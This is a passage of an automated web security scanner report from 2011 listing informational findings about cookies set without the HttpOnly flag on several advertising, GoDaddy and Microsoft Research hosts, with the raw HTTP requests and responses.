Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=4&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Domain&dtmc_product_id=TTN%3A%20Domains%3A%20Search%3A%20Taken&dtmc_domain_name=xss.com&dtm_items=&dtmc_domain_status=TAKEN&dtmc_domain_variations=xss.la&dtmc_source=WWW000000000W&dtmc_ref=http%3A//www.register.com/&dtmc_loc=http%3A//www.register.com/domain/searchresults.rcmx%3Fwebmetrics%3Dnull%26searchOrigin%3Dhomepage%26domain%3Dxss%26selectedTLDs%3D.com%26x%3D0%26y%3D0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 47
Content-Type: image/gif
Set-Cookie: FFAbh=977B305,20|149_1#365:826,20|121_977#365;expires=Fri, 02 Dec 2011 21:40:29 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFBbh=977B305,20|149_1#0:826,20|121_977#0;expires=Sun, 02 Sep 2012 21:40:29 GMT;domain=.zedo.com;path=/;
ETag: "91967049-de5c-4a8e112997f00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=29883
Expires: Sun, 04 Sep 2011 05:58:32 GMT
Date: Sat, 03 Sep 2011 21:40:29 GMT
Connection: close

GIF89a.............!.......,...........D..;



11.17. https://cart.godaddy.com/basket.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cart.godaddy.com
Path:   /basket.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /basket.aspx?app%5Fhdr= HTTP/1.1
Host: cart.godaddy.com
Connection: keep-alive
Referer: http://www.godaddy.com/gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; BlueLithium_ssl=dbdflblbdeidccshddredcccjfvazaii; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; adc1=US; currency1=potableSourceStr=USD; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMinorVer=3&fMajorVer=10&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=; domainYardVal=%2D1; serverVersion=A

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:48:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: currency1=potableSourceStr=USD311ef78c60812ba60cb9d86e; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:48:28 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:48:28 GMT; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault&sitename=cart.godaddy.com&page=/basket.aspx&server=M1PWCARTWEB009&status=200 OK&querystring=app_hdr=&piishown=0&shopper=46215871&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=19a7e39c-dcff-40f6-8f6d-e19d0c50259d&split=24&referringdomain=; domain=godaddy.com; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 405795


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">

...[SNIP]...

11.18. http://cf.addthis.com/red/p.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /red/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=2&gen=1000&gen=100&sid=4e6264ca66bc96d7&callback=_ate.ad.hrr&pub=xa-4c99effd765dd67e&uid=4e5e3f1ae3fd7427&url=http%3A%2F%2Fvasco.com%2Fcompany%2Fpress_room%2Fnews_archive%2F2011%2Fnews_diginotar_reports_security_incident.aspx&ref=http%3A%2F%2Fvasco.com%2F&1lovjpa HTTP/1.1
Host: cf.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; di=%7B%7D..1314983342.10R|1314983342.1FE|1314983342.1OD|1314983342.60|1314983342.1EY; psc=4; uid=4e5e3f1ae3fd7427; uvc=17|35; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Sat, 03 Sep 2011 17:32:22 GMT
Set-Cookie: di=1314983342.10R|1314983342.1FE|1314983342.1OD|1314983342.60|1314983342.1EY; Domain=.addthis.com; Expires=Mon, 02-Sep-2013 17:32:22 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 03-Oct-2011 17:32:22 GMT; Path=/
Content-Type: text/javascript
Content-Length: 88
Date: Sat, 03 Sep 2011 17:32:21 GMT
Connection: close

_ate.ad.hrr({"urls":[],"segments":[],"loc":"OTUxMDFOQVVTQ0EyMTczMDU4MDgwNzc0MDAwVg=="});

11.19. http://cf.addthis.com/red/usync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /red/usync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/usync?pid=6&puid=6422714091563403120 HTTP/1.1
Host: cf.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1; uid=4e5e3f1ae3fd7427; uvc=22|35; psc=0; dt=X; di=%7B%7D..1315071141.10R|1315071225.1WV|1315071141.1FE|1314983342.1OD|1315071141.60|1315071141.1EY

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: di=%7B%226%22%3A%226422714091563403120%22%7D..1315071277.1WV|1315071141.10R|1315071141.1FE|1315071141.60|1315071141.1EY|1314983342.1OD; Domain=.addthis.com; Expires=Mon, 02-Sep-2013 17:34:55 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Content-Type: image/png
Content-Length: 67
Date: Sat, 03 Sep 2011 17:34:55 GMT
Connection: close

.PNG
.
...IHDR.............:~.U...
IDATx.c`......H..q....IEND.B`.

11.20. http://community.research.microsoft.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.research.microsoft.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: community.research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
CommunityServer: 4.1.31106.3070
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 03 Sep 2011 08:26:47 GMT; expires=Sun, 02-Sep-2012 13:26:47 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: CSAnonymous=7ae6ffeb-cdb2-483f-8991-07caf2fbdb8f; expires=Sat, 03-Sep-2011 13:46:47 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:26:47 GMT
Connection: close
Content-Length: 28641


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

11.21. http://cspix.media6degrees.com/orbserv/hbpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4e5e3f1ae3fd7427&curl=http%3a%2f%2fvasco.com%2fcompany%2fpress_room%2fnews_archive%2f2011%2fnews_diginotar_reports_security_incident.aspx HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lqt1dm0zijasq5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=016020a0e0f0g0h1lqt1dmxzt137enxzt137enxzt10xzt137enxzt10; orblb=2lqupib012fd10u0100000; vstcnt=41bb010r053d7x118e10124zbs2150v10024fj9y118e10024t1es127p1012455ue118e1022; clid=2lqt1dm01170vf1kj11kp2en03m9g00b6t05100b906; sglst=41bb00v00t044m9v00arr9v00dnh9u303td9v00arp9u30f7u9u307219v000kn9v00a6p9v005m39v005m29u305no9u30dsb9v00cnw9v00esh9v00cnu9u30gol9u30esg9u30ctn9u308nc9v00ebb9v00ctp9v00cro9v004qk9u30h9v9u30dzq9u30bow9u304wb9v00dzt9v000xz0108dy9v0; rdrlst=41a0sh6lqupib000000066t051d6blqupib000000066t051byalqtqj1000000096t05120zlqupib000000066t0513kulqupib000000066t0516pilqwj0f000000026t020x18lqupib000000066t0518k8lqupib000000066t0516pelqtqj1000000096t0518ldlqwnn2000000016t0118lclqupib000000066t0518erlqtqj1000000096t05163mlqupib000000066t0518etlqwj0f000000026t0209pglqupib000000066t051679lqupib000000066t050dhvlqupib000000066t050dhxlqwj0f000000026t0218lplqupib000000066t0514kelqtqj1000000096t0518lqlqwj06000000036t0314khlqwj0f000000026t0214hnlqwj0f000000026t020lw4lqwj0f000000026t0218l0lqtqsb000000076t050lm0lqupib000000066t0517fllqupib000000066t0517gxlqtqj1000000096t0518kzlqwj02000000046t040lm4lqupib000000066t050llslqupib000000066t050zpelqwj0f000000026t020zpclqtqj1000000096t0519ezlqtqj1000000096t0518knlqw8s9000000056t0506pblqupib000000066t0518kmlqtqjn000000086t050afolqupib000000066t0507sylqupib000000066t050kkjlqupib000000066t050drhlqupib000000066t0514bxlqwj0f000000026t0214bulqtqj1000000096t051cyqlqtqj1000000096t050huxlqtqj1000000096t0516d5lqwj0f000000026t02

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: orblb=2lqupib012fd10u0100000; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
Set-Cookie: vstcnt=41bb010r063d7x118e10124zbs2150v10024fj9y118e10024t1es127p10124uzg6118e1032455ue118e1022; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
Set-Cookie: clid=2lqt1dm01170vf1kj11kp2en05i0c00d6u02100d908; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
Set-Cookie: sglst=41bb00v00t044m9w00arr9w00dnh9u303td9w00arp9u30f7u9u307219w000kn9w00a6p9w005m39w005m29u305no9u30dsb9w00cnw9w00esh9w00cnu9u30gol9u30esg9u30ctn9u308nc9w00ebb9w00ctp9w00cro9w004qk9u30h9v9u30dzq9u30bow9u304wb9w00dzt9w001bi030ag29w008dy9w000td9w0; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
Set-Cookie: rdrlst=41c0sh6lqupib000000086u021d6blqupib000000086u021byalqtqj10000000b6u02120zlqupib000000086u0213kulqupib000000086u0216pilqwj0f000000046u020x18lqupib000000086u0218k8lqupib000000086u0216pelqtqj10000000b6u0218ldlqwnn2000000036u0218lclqupib000000086u0218erlqtqj10000000b6u02163mlqupib000000086u0218etlqwj0f000000046u0209pglqupib000000086u021679lqupib000000086u020dhvlqupib000000086u020dhxlqwj0f000000046u0218lplqupib000000086u0214kelqtqj10000000b6u0218lqlqwj06000000056u0214khlqwj0f000000046u0214hnlqwj0f000000046u0218l0lqtqsb000000096u020lm0lqupib000000086u020lw4lqwj0f000000046u0217fllqupib000000086u0217gxlqtqj10000000b6u0218kzlqwj02000000066u020lm4lqupib000000086u020llslqupib000000086u020zpelqwj0f000000046u021192lqyjdy000000026u020zpclqtqj10000000b6u0219ezlqtqj10000000b6u0218knlqw8s9000000076u0206pblqupib000000086u0218kmlqtqjn0000000a6u020afolqupib000000086u0207sylqupib000000086u020kkjlqupib000000086u020drhlqupib000000086u0210telqyjdy000000016u0114bxlqwj0f000000046u0214bulqtqj10000000b6u021cyqlqtqj10000000b6u020huxlqtqj10000000b6u0216d5lqwj0f000000046u02; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
Location: http://cm.g.doubleclick.net/pixel?nid=media6degrees
Content-Length: 0
Date: Sat, 03 Sep 2011 17:32:22 GMT
Connection: close


11.22. http://d.adroll.com/pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6?pv=41622699308.20912&cookie=&keyw=ssl+certificates HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/geotrust-ssl-certificates/quickssl.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=a93684bbe302491756ff3d9c64c60001

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Sat, 03 Sep 2011 21:30:27 GMT
Connection: keep-alive
Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6/3NUTGTWFSRFIPAWBFDEMYM.js
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


11.23. http://d7.zedo.com/img/bh.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=809&g=20&a=3&s=1&t=i HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=SEO000000000W&dtmc_ref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&dtmc_loc=http%3A//www.register.com/
Cookie: FFgeo=5386156; ZFFBbh=955B826,20|633_962#7Z695_955#5Z332_950#4; ZEDOIDA=mLs5ThcyantsGCRD8ld6EMRU~080311; ZFFAbh=946B826,20|633_962#381Z695_955#374Z332_950#369; FFAbh=950B809,20|10_1#365:305,20|458_1#371Z145_2#371; FFBbh=962B305,20|145_2#3Z458_1#0:809,20|10_1#0; ZEDOIDX=5

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 47
Content-Type: image/gif
Set-Cookie: FFAbh=950B809,20|3_2#392Z10_1#365:305,20|458_1#371Z145_2#371;expires=Fri, 02 Dec 2011 21:56:38 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFBbh=962B809,20|3_2#30Z10_1#0:305,20|145_2#3Z458_1#0;expires=Sun, 02 Sep 2012 21:56:38 GMT;domain=.zedo.com;path=/;
ETag: "1b6340a-de5c-4a8e0f9fb9dc0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=14707
Expires: Sun, 04 Sep 2011 02:01:45 GMT
Date: Sat, 03 Sep 2011 21:56:38 GMT
Connection: close

GIF89a.............!.......,...........D..;



11.24. http://d7.zedo.com/img/bh.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=826&g=20&a=121&s=$t&l=1&t=i&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=4&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Domain&dtmc_product_id=TTN%3A%20Domains%3A%20Search%3A%20Taken&dtmc_domain_name=xss.com&dtm_items=&dtmc_domain_status=TAKEN&dtmc_domain_variations=xss.la&dtmc_source=WWW000000000W&dtmc_ref=http%3A//www.register.com/&dtmc_loc=http%3A//www.register.com/domain/searchresults.rcmx%3Fwebmetrics%3Dnull%26searchOrigin%3Dhomepage%26domain%3Dxss%26selectedTLDs%3D.com%26x%3D0%26y%3D0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 90
Content-Type: image/gif
Set-Cookie: ZFFAbh=977B826,20|121_977#365;expires=Fri, 02 Dec 2011 21:40:25 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZFFBbh=977B826,20|121_977#0;expires=Sun, 02 Sep 2012 21:40:25 GMT;domain=.zedo.com;path=/;
ETag: "3a9d58c-de5c-4a8e0f9fb9dc0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=24701
Expires: Sun, 04 Sep 2011 04:32:06 GMT
Date: Sat, 03 Sep 2011 21:40:25 GMT
Connection: close

GIF89a.............!.......,...........D..;


GIF89a.............!.......,...........D..;

11.25. http://ds.addthis.com/red/psi/sites/vasco.com/p.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/vasco.com/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/vasco.com/p.json?callback=_ate.ad.hpr&uid=4e5e3f1ae3fd7427&url=http%3A%2F%2Fvasco.com%2Fcompany%2Fpress_room%2Fnews_archive%2F2011%2Fnews_diginotar_reports_security_incident.aspx&ref=http%3A%2F%2Fvasco.com%2F&1wh4476 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; di=%7B%7D..1314983342.10R|1314983342.1FE|1314983342.1OD|1314983342.60|1314983342.1EY; psc=4; uid=4e5e3f1ae3fd7427; uvc=17|35; uit=1

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 03 Sep 2011 17:32:22 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 03 Oct 2011 17:32:22 GMT; Path=/
Set-Cookie: di=%7B%7D..1315071141.10R|1315071142.1WV|1315071141.1FE|1314983342.1OD|1315071141.60|1315071141.1EY; Domain=.addthis.com; Expires=Mon, 02-Sep-2013 17:32:21 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 03 Sep 2011 17:32:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 03 Sep 2011 17:32:22 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

11.26. http://idcs.interclick.com/Segment.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=46b8b784-19e0-4400-8cdb-f6284ddc3d9a HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=WWW000000000W&dtmc_ref=&dtmc_loc=http%3A//www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=ef156cf5-d9a2-4704-9dc3-362f08c1bcb4; sgm=12290=734380

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=12290=734380&7435=734382; domain=.interclick.com; expires=Fri, 03-Sep-2021 21:34:02 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sat, 03 Sep 2011 21:34:02 GMT

GIF89a.............!.......,...........D..;

11.27. https://idp.godaddy.com/login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://idp.godaddy.com
Path:   /login.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.aspx?SPKey=GDMYA-M1PWMYAWEB006&redirect=true&myaurl=%2fdefault.aspx HTTP/1.1
Host: idp.godaddy.com
Connection: keep-alive
Referer: https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB109&target=http%3A%2F%2Fwww.godaddy.com%2Fssl%2Fssl-certificates.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; ASP.NET_SessionId=pwylm3umzkrcsc3bnf5ymbnz; pathway=4f057259-4645-4223-96aa-98d6262a1c68; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=3; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; adc1=US; currency1=potableSourceStr=USD; traffic=; ShopperId1=miaasiuadhnegiagkeyasfgdujffpbkb

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 00:30:45 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://mya.godaddy.com/login_redirect.aspx?idpinfo=none&SPKey=GDMYA-M1PWMYAWEB006&myaurl=%2fdefault.aspx
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:30:45 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:30:45 GMT; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
